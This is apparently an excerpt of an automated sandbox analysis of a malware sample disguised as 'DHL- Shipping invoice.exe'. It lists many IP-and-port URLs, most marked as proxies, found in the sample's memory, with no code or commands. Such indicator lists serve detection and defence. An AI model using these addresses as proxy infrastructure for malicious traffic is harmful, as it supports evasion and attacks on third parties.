                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.201.212.198:4673
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.201.212.198:4673://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.205.169.74:53281
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.205.169.74:53281://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.205.169.74:53281x
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.3.6.76:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.3.6.76:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.72.29.174
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.72.29.174://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.72.29.174:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.99.138.162
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.99.138.162://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.99.138.162:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://63.250.52.82:8118
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://63.250.52.82:8118://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.157.16.4
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.157.16.43:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.157.16.43:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.201.163.133
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.201.163.133://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.201.163.133:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.202.186.2:20189
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.202.186.2:20189://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.225.4.63:9993
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.225.4.63:9993://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.227.108.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.227.108.25:31908
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.227.108.25:31908://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.227.134.208
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.227.134.208://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.227.134.208:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.227.4.90:8000
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.227.4.90:8000://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.44.139.12:20037
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.44.139.12:20037://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.56.150.102:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.56.150.102:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.1.244.232:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.1.244.232:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.1.40.47:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.1.40.47:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.108.9.181
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.108.9.181://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.108.9.181:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.109.163.154
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.109.163.154://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.109.163.154:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.20.147.153:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.20.147.153:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.21.131.27
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.21.131.27://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.21.131.27:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.135.227.181:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.135.227.181:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.191.31.158
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.191.31.158://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.191.31.158:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.140.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.140.209:8899
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.140.209:8899://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.33.1
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.33.190:17464
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.33.190:17464://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.33.190:46648
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.33.190:46648://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.33.190:7841
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.33.190:7841://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.35.209:19497
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.35.209:19497://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.37.2
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.37.252:14321
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.37.252:14321://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.37.252:24360://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.37.252:29466
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.37.252:29466://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.27.58.70:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.27.58.70:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.128.2
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.128.241:58400
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.128.241:58400://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.128.242:23854
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.128.242:23854://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.128.245:57189://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.129.56:57129
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.129.56:57129://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.45.246.194:8888
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.45.246.194:8888://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.63.168.119:8000
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.63.168.119:8000://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.70.225.202:8050
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.70.225.202:8050://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980490000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.84.6.21:51996
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.84.6.21:51996://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.84.6.21:62645
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.84.6.21:62645://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.201.59.70:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.201.59.70:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.205.177.122:21108
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.205.177.122:21108://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.210.115:41455
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.210.115:41455://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.210.60:35910
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.210.60:35910://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.48:43971
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.50:39988
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.50:39988://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.57:59930
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.57:59930://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.217.61.162
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.217.61.162://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.217.61.162:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.22.28.62:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.22.28.62:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.227.186.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9813F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.227.186.23:57676
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.227.186.23:57676://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.227.186.83:56370
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.227.186.83:56370://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981E82000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.2
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.226:25639
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.226:25639://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:16829
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:16829://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9805F3000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983943000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:17485
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983943000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:17485://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:1959
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:1959://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:20385
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:20385://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981E82000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:2295
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:2295://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:30613
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:30613://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:7335
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:7335://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:7347
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:7347://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.227:7347x
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:16495
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:1983
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:1983://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:27305
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:27305://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:27743
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981420000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:27743://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:2999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:2999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:3857
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:3857://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:6643
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:6643://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:9039
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.228:9039://proxy8
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.230:23685
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.227.230:23685://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.2
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.250:11765
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.250:11765://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.250:14713
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.250:14713://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.250:18003
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.250:18003://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.251:22821
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.251:22821://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:11871
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:11871://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:13873
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:13873://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9815F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:14223
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:14223://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.43.228.253:14545
